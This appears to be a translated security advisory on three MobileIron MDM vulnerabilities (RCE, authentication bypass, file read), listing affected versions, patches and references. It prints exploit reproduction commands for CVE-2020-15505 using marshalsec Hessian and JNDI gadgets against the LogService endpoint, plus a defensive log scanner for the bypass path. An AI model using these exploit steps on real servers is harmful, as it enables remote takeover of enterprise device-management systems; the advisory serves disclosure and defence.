MobileIron | November advisory: multiple security vulnerabilities in MDM

Published 2020-11-26

0x00 Vulnerability Overview

Product | CVE ID | Type | Severity | Remotely exploitable
MobileIron Core & Connector, Sentry, Monitor and Reporting Database (RDB) | CVE-2020-15505 | RCE | Critical | Yes
MobileIron Core & Connector | CVE-2020-15506 | Authentication bypass | Critical | Yes
MobileIron Core | CVE-2020-15507 | Arbitrary file read | High | Yes

 

0x01 Vulnerability Details

 


 

MobileIron is one of the world's leading and fastest-growing mobile IT solution vendors; nearly 20,000 companies worldwide use MobileIron's mobile device management (MDM) solution.

On October 22, 2020, MobileIron published an updated advisory stating that multiple security vulnerabilities in MDM (CVE-2020-15505, CVE-2020-15506 and CVE-2020-15507) had been fixed in the patches released on June 15. The vulnerability details are as follows:

MobileIron remote code execution vulnerability (CVE-2020-15505)

This is a remote code execution vulnerability in MobileIron mobile device management (MDM), with a CVSS score of 9.8. An attacker can use it to execute arbitrary code and take control of the company's servers.

A PoC for this vulnerability was published on GitHub in September. Recently, APT groups and cybercrime groups have been actively attempting to exploit it.

 

Vulnerability reproduction:

Groovy deserialization gadget

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "" > exp.ser

python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser


 

Local JNDI injection

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C ""

java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://:1099/> exp

python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'

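As an added defensive example (not from the advisory, the PoC, or MobileIron), the following Python scans web-server access logs for the "/.;/" path segment that the reproduction above uses to reach the Hessian LogService endpoint, so that attempts can be found in historical logs while patching is under way. The combined log format, the sample lines and the field names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Nov/2020:10:01:12 +0800] "POST /mifs/.;/services/LogService HTTP/1.1" 200 512 "-" "python-requests/2.24"
10.0.0.6 - - [26/Nov/2020:10:02:30 +0800] "GET /mifs/login.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [26/Nov/2020:10:03:01 +0800] "POST /mifs/%2E%3B/services/LogService HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.8 - - [26/Nov/2020:10:04:44 +0800] "GET /mifs/c/user/index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# The reproduction above reaches the Hessian service through /mifs/.;/services/...:
# a ".;" segment that the front end treats as a directory but the servlet
# container collapses. Flag any such segment after URL-decoding.
BYPASS_SEGMENT = re.compile(r'/\.;[^/]*/')
SERVICES_PATH = re.compile(r'/services/', re.IGNORECASE)


def classify_path(path):
    """Return a reason string if the path carries the bypass segment, else None."""
    decoded = unquote(unquote(path))  # tolerate single and double URL encoding
    if not BYPASS_SEGMENT.search(decoded):
        return None
    if SERVICES_PATH.search(decoded):
        return "normalisation bypass reaching /services/ (Hessian endpoint)"
    return "normalisation bypass segment"


def scan(log_text):
    """Return the suspicious requests found in access-log text, in order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        reason = classify_path(m["path"])
        if reason:
            hits.append({"src": m["src"], "ts": m["ts"], "path": m["path"],
                         "status": int(m["status"]), "reason": reason})
    return hits
```

A 200 response on a flagged request deserves follow-up on the host; a 404 after patching is the expected behaviour once the fixed versions below are installed.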

 

Affected versions:

MobileIron Core & Connector: 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, 10.6.0.0

Sentry: 9.7.2 and earlier, 9.8.0

Monitor and Reporting Database (RDB): 2.0.0.1 and earlier

 

 

MobileIron authentication bypass vulnerability (CVE-2020-15506)

This is an authentication bypass vulnerability in MobileIron mobile device management (MDM), with a CVSS score of 9.8. An attacker can use it to bypass the authentication mechanism.

Affected versions:

MobileIron Core & Connector:

10.3.0.3 and earlier

10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3

10.5.1.0, 10.5.2.0

10.6.0.0

 

 

MobileIron arbitrary file read vulnerability (CVE-2020-15507)

This is an arbitrary file read vulnerability in MobileIron mobile device management (MDM), with a CVSS score of 7.5. An attacker can use it to read sensitive information from the file system.

Affected versions:

MobileIron Core:

10.3.0.3 and earlier

10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3

10.5.1.0, 10.5.2.0

10.6.0.0

 

 

0x02 Remediation Advice

MobileIron has released the relevant updates; it is recommended to upgrade to the following versions.

MobileIron Core & Enterprise Connector:

v10.3.0.4, v10.4.0.4, v10.5.1.1, v10.5.2.1, v10.6.0. or later.

MobileIron Sentry:

v9.7.3, v9.8.1 or later.

MobileIron Monitor and Reporting Database (RDB):

v2.0.0.2 or later.

 

Patch link:

https://help.mobileiron.com/s/article-detail-page?Id=kA12T000000g065SAA

 

0x03 References

https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/

https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505

 

0x04 Timeline

2020-07-01  MobileIron publishes security advisory

2020-10-22  MobileIron updates security advisory

2020-11-26  VSRC publishes security advisory

 

0x05 Appendix

CVSS scoring standard (official site): http://www.first.org/cvss/
